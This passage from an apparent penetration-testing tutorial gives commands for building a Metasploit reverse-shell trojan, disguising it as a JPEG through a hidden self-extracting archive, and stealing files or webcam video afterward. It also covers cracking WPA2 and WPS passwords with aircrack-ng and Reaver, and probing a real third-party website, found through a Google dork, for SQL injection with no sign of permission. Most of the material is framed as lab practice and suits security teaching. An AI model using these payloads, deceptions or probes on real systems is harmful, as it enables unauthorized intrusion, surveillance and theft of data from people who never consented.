compromised, and we will be able to control it remotely. The result will be a
meterpreter for us, which is a command line to perform any type of
commands remotely.
Move the file to the Windows 10 machine in your lab. In the real world, the
file is downloaded to the victim’s machine using various social engineering
techniques.
Step 4: Go to your Kali machine and type these commands in Metasploit:
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.211.130
set LPORT 5555
exploit
The handler will listen for incoming connections from the victim on that port.
You will notice that this session has started a reversed TCP handler on the IP
to 192.168.211.130, which is our IP. If you go to the victim’s machine and
double click on trojan.exe, a meterpreter session will be open between the
two IPs, 130 and 129. Now we have a meterpreter shell. Type help to see all
the commands you can run on the compromised system.

Step 5: Some of the initial post-exploitation commands you can use are:
sysinfo, to see the system information of the Windows 10 machine: computer name, OS, architecture, domain or workgroup, and the currently logged-on users.
ls, to list the files and directories in the current working directory on the target.
ipconfig, to see the network configuration of the remote machine.
You can also search for files on the compromised system and download them to your machine. In the example below, I will download the file hobbit.txt. Use the download command and paste the path; because the Meterpreter console treats the backslash as an escape character, either double each backslash or change the backslashes to forward slashes.

You can go to a new terminal and type ls to verify that hobbit.txt has been downloaded. You can do the same for any file on the compromised machine.

One of the most important commands is shell. It gives you a Windows command prompt (cmd.exe) on the target, in which you can type all the commands you are familiar with.

Explore the Powerful Armitage Tool


Armitage is a GUI front end for Metasploit. It visualizes targets, recommends exploits and exposes many post-exploitation features. Armitage lets more than one person take part in an attack by sharing one Metasploit instance, which is handy for a team. It automates many tasks that are tedious to do in Metasploit by hand, and it lets you pivot: use a compromised target as a foothold to launch attacks against the rest of its LAN.
First of all, install Armitage with sudo apt-get install armitage. Then open a terminal and start the PostgreSQL service: Armitage relies on the Metasploit database, and without it the GUI is slow to start. Now type armitage and press Enter. Alternatively, run Armitage from the main menu under Exploitation Tools. Remember to use sudo if you are using the default kali account.

Press on connect and choose yes to load the graphical interface.


The interface is easy to understand; it has three panes. The first is the target pane, the second is the module pane, which we already explored in the Metasploit section, and the third is the console pane.
Let us start with a quick OS scan of our network. Go to Hosts → Nmap Scan → Quick Scan (OS detect) and enter the subnet when prompted. Wait a while for Armitage to populate the hosts it found and their operating systems.
In the example below, the scan returned five machines, two of them Linux and two of them Windows. Notice that the operating-system icons are displayed for ease of use.

One notable feature of Armitage is Hail Mary. It is a brute-force approach: Armitage throws every exploit it considers relevant at the target. This is extremely noisy and floods the network with traffic, so it is not recommended; try individual exploits instead. The module pane is a file-tree structure that is easy to navigate. The console pane shows you the Metasploit commands that Armitage is invoking on your behalf.
Let us create a payload, move it to the Windows machine, run it there, and receive a Meterpreter session in Armitage. Go to the module pane, payloads → windows → meterpreter, double-click meterpreter_reverse_tcp and choose a port that is easy to remember, for example 9090. For Output, select exe. This creates an exe file, which is our payload.

Create a file named virus101.exe and move it to the Windows machine (the victim's machine).

Back on the Kali machine, we need a handler to manage the incoming connection from the compromised target. Double-click meterpreter_reverse_tcp again, select multi handler this time and make sure you use the same port as before.

A handler will be started, listening for incoming connections on port 9090. To emulate the attack, go to the Windows machine and double-click virus101.exe. Notice that a Meterpreter session has been opened on the Kali machine, and that the icon of the compromised target changes in Armitage, as shown below.

So, what can we do now?


In Metasploit we had to type commands to manipulate the target system; in Armitage it is much easier. Right-click the compromised system and open its Meterpreter session menu, where you will see a list of actions you can perform. You can browse files, list drives and open a command shell. Some of the fun things you can do on your compromised lab machine are to take a screenshot of the current desktop and stream live video from the webcam.
Armitage is a really powerful tool and I have only given you the basics; explore and learn more on your own.

Hide a Payload in a JPEG Image


In the real world, moving the payload you have just created in Armitage onto the target machine is not as easy as you may think. It happens through many social engineering channels that we will learn about later in this book. To give you a glimpse, we will hide the payload behind a JPEG image.
Download a nice image from the internet to use as your bait. In the example below, I downloaded a JPEG image and converted it to an ICO icon on one of the free conversion websites. Now we have the following three files.

As a prerequisite for this attack, install WinRAR on your Windows machine. Select the payload file and the JPEG file, right-click and choose Add to archive, then tick Create SFX archive, as shown below. An SFX archive is a self-extracting executable: when it is double-clicked it extracts its contents and can run programs silently in the background. The trick is to get the user to double-click our SFX file and see only a JPEG being displayed, while in the background our payload runs as well.
So, select Create SFX archive, go to the Advanced tab and open SFX options. On the Text and icon tab select the smiley icon we prepared. On the Modes tab select Hide all, so the user sees nothing of what happens in the background. On the Setup tab, specify the programs to run after extraction: the JPEG file, so that it opens, and virus101.exe, as shown below.
Now everything is ready. Double-click the SFX file and a nice JPEG image is displayed. Go back to the Kali machine and you will see that a session has been created for the target machine. Right-click the compromised machine and explore the attacks available under its Meterpreter session.
Note that the result is still an .exe file, even if the icon looks like a picture; the trick works because Windows hides file extensions for known file types by default, and it fails against users who have that setting turned off or against antivirus that inspects SFX archives.
How to Attack Modern Wireless Networks?
Introduction
Several standards allow different Wi-Fi devices to interoperate. The best known is IEEE 802.11 with its amendments 802.11a, b, g and n. The base standard says little about security, so security mechanisms were defined as extensions: WEP, WPA, WPA2 and, since 2018, WPA3.
Security in a network with no physical boundary is a real problem: you are exposed to attacks such as man-in-the-middle, where someone captures your session and redirects you elsewhere. So it is important to understand wireless security.
WEP was introduced in 1997 with the original 802.11 standard, WPA followed in 2003 and WPA2 in 2004. The cipher is RC4 for WEP and WPA (WPA wraps RC4 in TKIP) and AES-CCMP for WPA2. The key size goes from 40 bits in WEP (104 bits in the later WEP-104 variant) to 128 bits in WPA and WPA2. In WEP the same static key encrypts every frame, which is why it is so easy to attack; WPA and WPA2 derive a fresh per-session key from the passphrase during the four-way handshake.

                 WEP          WPA           WPA2         WPA3
Year             1997         2003          2004         2018
Cipher           RC4          RC4 (TKIP)    AES-CCMP     AES-CCMP / GCMP-256
Key size         40/104 bits  128 bits      128 bits     128 bits (192-bit enterprise mode)
Encryption key   Static       Per-session   Per-session  Per-session

WPS stands for Wi-Fi Protected Setup. It lets you connect a device to your wireless router faster and more easily. WPS only works with WPA Personal or WPA2 Personal networks; it does not work with WEP. Normally, to connect a device to a wireless network you must know the SSID and the password, unless it is an open network. With the WPS button you do not need to enter any password.
To connect a device such as a laptop or smartphone with WPS, press the WPS button on your router, then on the device select your wireless network name and connect. The device joins the network automatically without asking for the password. This works for any WPS-capable device, including wireless range extenders and wireless printers, and makes for a quick connection between your router and your device.
Why Wi-Fi Protected Setup is Insecure?
Along with the push-button method, you can also enter an eight-digit PIN to connect to the router. Every WPS-enabled router has such a PIN, usually printed on a label; it is generated by the manufacturer and on many routers cannot be changed. If the router supports WPS but has no WPS button, the connection is established with this PIN.
The weakness is in how the PIN is verified. The eighth digit is only a checksum of the first seven, and the router checks the PIN in two halves: the first four digits are confirmed or rejected in the fourth handshake message, the remaining digits in the sixth. An attacker therefore learns whether the first half is right independently of the second, so instead of 10,000,000 possibilities there are at most 10,000 + 1,000 = 11,000 guesses. Many routers also do not limit how many attempts are allowed, so tools can try PINs over and over again until the right one is found.
The push-button method is safer than the PIN method: to abuse it an attacker must physically reach the router, press the button, and connect within the two-minute window that the button opens.
How to Disable WPS (Wi-Fi Protected Setup)?
Most wireless routers enable WPS by default. To disable it, open the router's administration page in a browser via its IP address, locate the WPS setting and turn it off. Depending on the brand of your router, the WPS setting can be in different places. Disabling WPS in the interface does not always disable it in the firmware, so check afterwards with a scanner such as wash that the access point no longer advertises WPS.
So even if you change the passphrase of your WPA/WPA2 network, as long as WPS stays enabled an attacker who has recovered the PIN once can run a tool in Kali and obtain the new passphrase in a matter of seconds.
We will approach each wireless protocol or setup differently. For WPA2 we will use the airmon-ng, airodump-ng and aireplay-ng tools. airmon-ng puts the wireless card into monitor mode so that it captures all the traffic around you. airodump-ng saves that traffic to a capture (PCAP) file. aireplay-ng lets you inject packets into the traffic; we will see this in detail.
By default, the virtual machine version of Kali does not have access to the host's built-in Wi-Fi card, so I will be using an external USB Wi-Fi adapter; its chipset must support monitor mode and packet injection. A TP-Link wireless USB adapter is recommended. Connect it to the VM and you will have a Wi-Fi interface inside your virtual machine, as shown below. You can also use a Kali live bootable DVD for this setup.

WPA and WPA2 Cracking


Open the terminal and type airmon-ng to list the wireless interfaces on your computer. The main wireless interface will be wlan0. The plan is to put this interface into monitor mode so that it listens to the wireless networks around us; do that with airmon-ng start wlan0. If you get errors about interfering processes, stop them with kill <process number> (the check kill option of airmon-ng does the same). Issue airmon-ng again and notice that the interface name has changed to wlan0mon.
Now we need to capture the traffic of the wireless networks around us and dump it to a file. The tool for this is airodump-ng, as shown below. Again, remember to use sudo if you are using the default kali account.

This command captures all the wireless traffic in range. BSSID is the MAC address of the access point; CH is the channel the network operates on; ENC is the encryption type, WPA2 for almost all networks here; and ESSID is the network name. I will do this attack on my own network, named Majo. Press Ctrl+C to stop the capture.

Now that we have the information about the access point we want to attack, the next step is to feed those values to airodump-ng so that it writes only the traffic of that network to a file. We use -w to name the capture file (attack1; airodump-ng appends a counter, so the file becomes attack1-01.cap), -c for the channel number (channel 5 in our case) and --bssid for the MAC address of the access point:
airodump-ng -w attack1 -c 5 --bssid E4:6F:13:31:65:1C wlan0mon
Now you will see all the clients connected to the specified access point, and the cap file will capture all the traffic of that BSSID. To perform the attack we need one more thing: the WPA four-way handshake, which is exchanged whenever a client connects or reconnects. We have two options. Since we are testing on our own network, you can do it manually: disconnect one of your workstations or smartphones from the Wi-Fi and reconnect it, and the handshake is captured. Or you can inject de-authentication frames so that a connected client re-authenticates, and capture the handshake that way.
To do that, open a second terminal and run the aireplay-ng command shown below. The -0 argument selects the de-authentication attack and the 10 is the number of de-authentication bursts to send (any number will do); -a is the MAC address of the access point and -c is the MAC address of the client we want to kick off. The WPA handshake notice should then appear in the header of the running airodump-ng capture, as shown below, and the capture file now contains a handshake.
aireplay-ng -0 10 -a E4:6F:13:31:65:1C -c 0C:8C:24:0F:66:A8 wlan0mon

Now that we have a cap file containing a WPA handshake, we are ready to crack the Majo network. Run aircrack-ng with -w followed by a wordlist. WPA2 cannot be broken by attacking the protocol the way WEP can; the only practical attack is guessing the passphrase offline against the captured handshake, so the attack is only as good as the wordlist. With a good wordlist you may recover the passphrase; with a weak one you will not.
I will use a wordlist that I created. aircrack-ng goes through every passphrase in the file and tests it against the handshake. The -b argument is the BSSID we are attacking, and the command ends with the capture file written by airodump-ng (attack1-01.cap), as shown below. Press Enter, and you will see that the key was found, as shown below.
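As an added example, not part of the book or of the aircrack-ng code, here is the computation aircrack-ng performs for each wordlist entry, written in Python: derive the PMK from the candidate passphrase and the SSID with PBKDF2, expand it to the PTK with the two MAC addresses and the two nonces from the handshake, and check the HMAC-SHA1 MIC of EAPOL message 2. The handshake below is constructed (the MACs are the ones from the text; the nonces, the EAPOL frame and the passphrase majo2020 are made up), which is why the example runs offline.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    The 4096 rounds are what makes every wordlist candidate cost something."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || B || i)
    with B = min(MACs) || max(MACs) || min(nonces) || max(nonces).
    The first 16 bytes of the PTK are the KCK, the key that signs the handshake."""
    b = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
         + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + b + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16].
    WPA/TKIP (version 1) uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """What aircrack-ng -w does: derive the MIC for each candidate and compare."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["client_mac"],
                           handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def demo_handshake(passphrase: str = "majo2020") -> dict:
    """Constructed handshake for the 'Majo' network: the MACs are the ones in the
    text; nonces, EAPOL message 2 and the passphrase are made up for the example."""
    ap_mac = bytes.fromhex("E46F1331651C")
    client_mac = bytes.fromhex("0C8C240F66A8")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    # EAPOL-Key message 2: version 1, type 3 (Key), body length 95, descriptor 2,
    # key info 0x010a, key length 0, replay counter 1, SNonce, IV/RSC/ID zero,
    # MIC field zeroed (as it is before MIC computation), empty key data.
    eapol = (b"\x01\x03\x00\x5f" + b"\x02" + b"\x01\x0a" + b"\x00\x00"
             + (1).to_bytes(8, "big") + snonce + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00")
    pmk = pmk_from_passphrase(passphrase, "Majo")
    kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
    return {"ssid": "Majo", "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol,
            "mic": eapol_mic(kck, eapol)}


def crack_demo(wordlist=("password", "12345678", "majo2020", "letmein")):
    return crack(demo_handshake(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", crack_demo())
```

Everything needed for the comparison (both MACs, both nonces, the MIC and the signed EAPOL frame) is in the captured handshake; the passphrase is the only unknown, and each guess costs 4096 HMAC rounds, which is why the wordlist decides the outcome.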

WPS Cracking
In the previous section we cracked a WPA2 access point by capturing a handshake and running the capture against a wordlist. The efficiency of that attack depends entirely on the strength of your wordlist: a passphrase with upper-case letters, special characters and numbers can take years to recover. WPS cracking offers an alternative: instead of the passphrase, we recover the router's 8-digit WPS PIN. Luckily we do not have to guess all 8 digits at once. The last digit is a checksum and the router verifies the PIN in two halves, so the first half (four digits, at most 10,000 guesses) and the second half (three digits, at most 1,000 guesses) can be brute-forced separately, which is a realistic number of guesses.
The good thing about having the WPS PIN is that even if the victim changes the WPA2 passphrase, running Reaver against the same access point with the same PIN will return the current passphrase within seconds, because the PIN does not change when the passphrase does.
So let us run Reaver. First, enable monitor mode on your network interface using airmon-ng, then issue wash -i wlan0mon. This lists the neighbouring access points that advertise WPS, along with the WPS version and whether WPS is currently locked (routers lock WPS after too many failed attempts, which slows the attack down).
Go to the terminal again and type reaver with -i to specify the interface, -b to specify the access point MAC address, and -vv (very verbose) to watch progress on the terminal. Run the command and leave it for several hours, typically overnight; at the end Reaver prints the WPS PIN and the current WPA2 passphrase.
reaver -i wlan0mon -b E4:6F:13:31:65:1C -vv
Suppose that the victim changed his password, all we have to do is to run
Reaver again with the same command plus the eight digit PIN that you
already got from the previous attack (12345670 in this example), and Reaver
will just display the new password within a matter of seconds.
reaver -i wlan0mon -b E4:6F:13:31:65:1C -vv -p 12345670
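The PIN checksum and the split verification described above and in the earlier section "Why Wi-Fi Protected Setup is Insecure?", as an added Python example that is not part of the book or of Reaver: RegistrarSim is a constructed model of a router with the PIN 12345670 from the text that answers the way a WPS registrar does (a NACK after M4 for a wrong first half, a NACK after M6 for a wrong second half), and recover_pin is the two-stage brute force. It ignores the lockouts and delays that make the real attack take hours.

```python
def wps_checksum(first7: str) -> int:
    """Checksum digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the first seven
    digits, then the digit that brings the sum to a multiple of 10."""
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - acc % 10) % 10


def make_pin(first7: str) -> str:
    return first7 + str(wps_checksum(first7))


def valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and make_pin(pin[:7]) == pin


class RegistrarSim:
    """Models how a WPS registrar (the router) verifies a PIN: the first half is
    proven in message M4 and the second half in M6, each with its own NACK."""

    def __init__(self, pin: str):
        self._pin = pin          # constructed target PIN
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            return "NACK after M4"   # first half wrong
        if pin[4:] != self._pin[4:]:
            return "NACK after M6"   # second half wrong
        return "M7"                  # router now hands over the WPA passphrase


def recover_pin(router: RegistrarSim):
    """The split brute force used by Reaver: at most 10,000 + 1,000 guesses."""
    for a in range(10_000):
        half1 = f"{a:04d}"
        # the second half of the probe is irrelevant until the first half is right
        if router.try_pin(half1 + "0000") != "NACK after M4":
            break
    else:
        return None
    for b in range(1_000):
        pin = make_pin(half1 + f"{b:03d}")   # only PINs with a valid checksum are worth sending
        if router.try_pin(pin) == "M7":
            return pin
    return None


MAX_SPLIT_GUESSES = 10_000 + 1_000
NAIVE_GUESSES = 10 ** 7   # valid 8-digit PINs if the halves could not be tested separately

if __name__ == "__main__":
    router = RegistrarSim("12345670")
    print(recover_pin(router), "recovered in", router.attempts, "attempts")
```

With the PIN 12345670, the first half is found after 1,235 guesses and the second after 568 more. A router that locks WPS after a few failures, or that rate-limits registrar exchanges, turns those 1,803 exchanges into hours, which is what "leave it overnight" above refers to.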

4+ Ways to Attack a Web Application


Web Applications Attack Surface
First published in 2003 and updated regularly since, the OWASP Top 10 is a list of the ten most critical web application security risks. It is produced to help developers, security teams and IT staff make sure that the applications they build and use are protected against the most critical and well-known risks.
OWASP is now the de facto standard for web application security. As application security threats are constantly evolving, the list is revised; the edition discussed here is the 2017 list, shown on the right below.

The list includes best practices for both detecting and remediating each class of vulnerability. Building on the previous edition, the 2013 version shown on the left, OWASP produced the updated 2017 list.
The list is compiled mainly by looking at how often each weakness occurs and how severe it is overall. A few things changed from 2013 to 2017. Two 2013 items, A4 Insecure Direct Object References and A7 Missing Function Level Access Control, were merged into one 2017 item, Broken Access Control. Two 2013 items did not make the 2017 list: Cross-Site Request Forgery and Unvalidated Redirects and Forwards. On top of that, three items are new in the 2017 list: XML External Entities (XXE), Insecure Deserialization, and Insufficient Logging and Monitoring.
Injection
If your application passes user input to a back-end database, an operating-system command or another interpreter, it may be vulnerable to injection attacks if that input is not handled properly. Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query, so that the attacker's data is executed as part of the command without authorisation. Common types are SQL, NoSQL, OS command and LDAP injection; XML External Entities (below) is a closely related injection into the XML parser.
Broken Authentication
When authentication and session management functions are not implemented correctly, attackers can compromise passwords, keys or session tokens, or exploit other implementation flaws to take over user identities.
Sessions must be unique to each user and properly managed (random, expiring, invalidated on logout); without that, an attacker can hijack a session and steal credentials and data.
Sensitive Data Exposure
As the name says, this occurs when controls such as HTTPS and encryption at rest are missing or implemented incorrectly, leaving a hole for attackers to steal sensitive information such as financial data, usernames, passwords, identifiers and other personally identifiable information (PII).
XML External Entities
An XML External Entities (XXE) attack is a type of injection against applications that parse XML input. It occurs when the XML input contains a reference to an external entity that is processed by a weakly configured XML parser. The impact ranges from disclosure of internal files and information, to denial of service, to server-side request forgery from the vulnerable server.
Broken Access Control
Broken Access Control is the result of merging Insecure Direct Object References and Missing Function Level Access Control. Access control enforces what authenticated users are and are not allowed to do within a web application. When it is not implemented correctly, attackers exploit that to perform unauthorised actions or read other users' data.
Security Misconfiguration
Security misconfiguration is the most commonly seen issue according to OWASP. Strong security requires secure configuration of applications, frameworks, web servers, databases and so on, and keeping them that way.
Cross-site Scripting
Cross-site scripting (XSS) is the best known item on the list in my opinion. It allows attackers to inject client-side scripts into web pages that are then executed in other users' browsers.
Insecure Deserialization
Serialization is the process of turning an object into a data format that can be restored later; objects are serialized to save them to storage or to send them over the network. Deserialization rebuilds the object from that format. Insecure deserialization occurs when untrusted data is deserialized: in many serialization formats the data can name the class to instantiate or the code to run, so an attacker can achieve remote code execution, or at least tamper with the object's fields.
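An added Python example (not from the book) of the vulnerability and its fix: pickle.loads on attacker-controlled bytes calls whatever callable the pickle names, here os.path.join as a harmless stand-in for os.system; a restricted Unpickler with an allow-list, or a data-only format such as JSON, refuses it. The payload and the allow-list are constructed for the example.

```python
import io
import json
import os
import pickle

# What the attacker's callable returns; proves the call happened.
PWNED_MARKER = os.path.join("pwned", "by", "pickle")


class Malicious:
    """Attacker-controlled object. On unpickling, Python calls the callable from
    __reduce__ with the given arguments. os.path.join is a harmless stand-in;
    os.system or subprocess.Popen would be invoked exactly the same way."""

    def __reduce__(self):
        return (os.path.join, ("pwned", "by", "pickle"))


def attacker_payload() -> bytes:
    """Bytes the attacker would send in a cookie, a form field or a message queue."""
    return pickle.dumps(Malicious())


def safe_payload() -> bytes:
    """A legitimate serialized object: plain builtins only."""
    return pickle.dumps({"user": "bob", "role": "reader"})


def vulnerable_load(data: bytes):
    """The vulnerable pattern: deserialising untrusted bytes with pickle.loads."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list the globals a pickle may reference; everything else is refused
    before it is ever called."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"),
               ("builtins", "int"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def hardened_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def hardened_load_rejects(data: bytes) -> bool:
    try:
        hardened_load(data)
    except pickle.UnpicklingError:
        return True
    return False


def json_load(text: str):
    """Simplest fix when you control both ends: a data-only format cannot name
    code to execute."""
    return json.loads(text)


if __name__ == "__main__":
    print("pickle.loads returned:", vulnerable_load(attacker_payload()))
    print("restricted unpickler rejects it:", hardened_load_rejects(attacker_payload()))
    print("restricted unpickler still loads data:", hardened_load(safe_payload()))
```

The same pattern exists in Java (ObjectInputStream), PHP (unserialize) and .NET (BinaryFormatter): the fix is always to stop accepting serialized objects from untrusted sources, or to restrict the types that may be instantiated, never to try to sanitise the bytes.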
Using Components with Known Vulnerabilities
This is when your application uses libraries and frameworks, often open-source ones, that run with the same privileges as the application. If one of them has a known vulnerability, the application inherits it.
Insufficient Logging and Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to keep attacking, maintain persistent access to your systems and tamper with, extract or destroy data without being noticed.

Metasploitable VM
The Metasploitable virtual machine is an intentionally vulnerable Ubuntu Linux build designed for practising penetration testing and ethical hacking. It is available as a VMware image; download it from the Rapid7 website or from GitHub, import it into your player, and once the machine starts you will be presented with the console shown below. Keep it on an isolated host-only lab network; it must never be exposed to an untrusted network.
Log in with msfadmin as both username and password, then run ifconfig to see the machine's IP address; in the screenshot below it ends in 211.139, i.e. 192.168.211.139 on our lab subnet.
Now type this IP address into the browser on Kali; you will be presented with a list of web applications: TWiki, phpMyAdmin, Mutillidae, DVWA and WebDAV. All of these are deliberately vulnerable web applications that come pre-installed in the Metasploitable image.
To open any of them just click on it; below is the Mutillidae web application.

It contains all of the vulnerabilities in the OWASP Top 10, plus a number of other vulnerabilities inspired by the Damn Vulnerable Web Application. Mutillidae lets you change the security level; you can toggle it as shown below.
If the application gets damaged by your injections and hacks, just click Reset DB and it will be reset to its original state. You can test your skills on the OWASP Top 10 through the menu on the left, where all the top vulnerabilities are listed.

As for the Damn Vulnerable Web Application (DVWA), log in with the username admin and the password password, and you will be presented with the home page, which has enough instructions to get started. DVWA is a PHP/MySQL web application that is, as its name says, vulnerable. Once again, its main purpose is to help you practise penetration testing and ethical hacking skills.
Discover Vulnerabilities in Websites
Nikto
Nikto is an open-source web server scanner that performs comprehensive tests for many problems, including dangerous files and programs, outdated server versions and server misconfigurations, as well as checks related to the OWASP Top 10.
Nikto runs over 6,000 tests against a website. This large number of tests for both security vulnerabilities and misconfigured web servers makes it a go-to tool for many security professionals and system administrators.
It is wise to start by scanning a website before performing any further penetration testing on it. Let us get to the bread and butter: open your Kali terminal and type nikto -h without arguments to see the help. Two of the important switches we will use are -Format and -Tuning. With -Tuning you choose which classes of tests to run, for example SQL injection, file upload or information disclosure.
Now, go to your web browser; I have installed Metasploitable on the IP shown below. It is just a virtual machine that hosts several web applications, for example the Damn Vulnerable Web Application. I will issue my nikto command against this web server:
nikto -h <IP>
where -h specifies the host, then press Enter.

It will start by printing some information about the server: the sites are hosted on Apache on an Ubuntu Linux server. Nikto then lists the problems it finds, such as the X-XSS-Protection header not being defined and the X-Content-Type-Options header not being set. It also prints OSVDB identifiers. OSVDB was the Open Sourced Vulnerability Database, similar in purpose to the CVE list; it was shut down in 2016, so look the identifiers up in an archive, or search for the finding text itself, to see exactly what type of vulnerability it is.
This is a single run with lots of output. If you want a report you can read comfortably, export it: add -o followed by an output file name, nikto in this example, and -Format htm (the F in -Format is uppercase), then press Enter:
nikto -h <IP> -o nikto -Format htm

Nikto writes the results to the file in HTML format. Right-click the file and open it in Firefox to see the report. This is important, especially for a penetration tester: document all the work you do. The report shows the target IP, the target hostname and the port (80 by default; use the -p switch to scan another port), that the server runs Apache 2.2.8 on Ubuntu, and every finding with its description and a link to the OSVDB entry. In short, it is a very handy report.
Going back to nikto: as we saw in the help, we can tune the scan for different purposes. To scan specifically for SQL injection, use tuning option 9. Without writing a report, the command is:
nikto -h <IP> -Tuning 9
It will scan this website only for SQL injection issues, and you can see the results.
You can also give a full URL, http://<IP>/ followed by the application path, to scan a specific application such as DVWA for SQL injection. As you can see, Nikto is a very handy tool, it is easy to use, and it is more or less a standard for web vulnerability scanning.
OWASP ZAP
Another useful tool is OWASP ZAP, an integrated penetration testing tool for finding vulnerabilities in web applications.
The OWASP Zed Attack Proxy (ZAP) is one of the world's most popular free security tools and is actively maintained by hundreds of international volunteers. It is intended both for people new to application security and for professional penetration testers. It is easy to start: go to Applications → Web Application Analysis and click OWASP ZAP, then follow the instructions on the screen. ZAP is easy to use: enter the IP address or URL of the web application and press the Attack button.

ZAP has four modes that control how aggressive it is allowed to be:
Standard mode: allows you to do anything to any site.
Safe mode: turns off all potentially dangerous features; nothing harmful can be done to a site in this mode.
Protected mode: potentially harmful actions are only allowed against sites in the defined scope.
ATTACK mode: nodes in scope are actively scanned as soon as they are discovered.
So let us try it: press Automated Scan, type the IP of the Metasploitable box, and click Attack.

ZAP will spider the applications on that box and run through the list of URLs it finds.
It will eventually display colour-coded alerts, categorised by risk (red for high, orange for medium, yellow for low and blue for informational).
You can click on an alert to see more details, such as the description, a recommended solution and references. It is a very easy and handy tool to use; let us stop here.

Now let me tell you about a more advanced feature. Most applications today require password authentication, and ZAP can log in for you so that the scan covers the authenticated part of the site. Select an application, for example DVWA, right-click the POST request for the login form, and click Include in Context → Default Context. Then select the authentication method; for form-based authentication you point ZAP at the login URL, and it picks up the request parameters automatically, so you only have to mark which parameter is the username and which is the password.
Under Users, add the user that ZAP should authenticate as; for DVWA this is admin with the password password, the defaults. Make sure session management is set to cookie-based, which is the default, and press OK. Right-click the site again and run the attack; the scan will now list the vulnerabilities reachable after login under the Alerts tab, again ordered by risk.

Control Database Server with SQLMap


sqlmap automates the process of detecting and exploiting SQL injection flaws in websites; it can go as far as taking over the database server. It comes with a powerful detection engine, many niche features for the penetration tester, and a broad range of switches ranging from database fingerprinting, to fetching data from the database, to accessing the underlying file system and executing commands on the operating system through out-of-band conn
ections.
If you open a web browser and search Google for pages whose URL contains php?id=1 (a so-called Google dork), you get a list of websites that pass a numeric id parameter to a database query. That is not a vulnerability in itself; such pages may be injectable, or may not.
I will take one of the websites on the list, "Contemporary Romanian Writers". Click it; as you can see, its URL uses id=1.

To check whether the page is injectable, add an apostrophe after the 1 in the URL and press Enter. If the page returns a database error message, the parameter reaches the SQL parser unescaped, which is a strong sign of injection.
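As an added Python example (not from the book or from sqlmap), the following in-memory SQLite stand-in for the romanian_svc database shows why the apostrophe test produces an error, how the same flaw yields every row or the schema (which is what sqlmap automates with --tables and --dump), and the parameterised query that closes the hole. The table and column names are taken from the text; the rows are made up.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the romanian_svc database in the text."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ra_autori (id INTEGER PRIMARY KEY, nume TEXT, prenume TEXT)")
    conn.executemany("INSERT INTO ra_autori (nume, prenume) VALUES (?, ?)",
                     [("Eminescu", "Mihai"), ("Creanga", "Ion"), ("Caragiale", "Ion Luca")])
    return conn


def author_vulnerable(conn, id_param: str) -> list:
    """The pattern behind ?id=1 on an injectable page: the parameter is pasted
    into the SQL text, so whatever it contains is parsed as SQL, not as data."""
    sql = "SELECT nume, prenume FROM ra_autori WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def author_safe(conn, id_param: str) -> list:
    """Validate the type, then bind the value; the database never sees it as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT nume, prenume FROM ra_autori WHERE id = ?",
                        (id_value,)).fetchall()


def probe(conn, lookup, id_param: str):
    """The apostrophe test from the text: an error that bubbles up tells you
    the input reached the SQL parser. Returns ('ok', rows) or ('error', message)."""
    try:
        return "ok", lookup(conn, id_param)
    except (sqlite3.Error, ValueError) as exc:
        return "error", str(exc)


if __name__ == "__main__":
    conn = make_db()
    # "1'" triggers the syntax error, "1 OR 1=1" dumps the table, the UNION
    # reads the schema the way sqlmap --tables does.
    for value in ("1", "1'", "1 OR 1=1", "0 UNION SELECT name, sql FROM sqlite_master"):
        print("vulnerable", repr(value), probe(conn, author_vulnerable, value))
        print("safe      ", repr(value), probe(conn, author_safe, value))
```

Note that the safe version rejects the malicious inputs before any SQL runs, and that it would still be safe without the int() check, because a bound parameter is sent as a value, never spliced into the statement.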

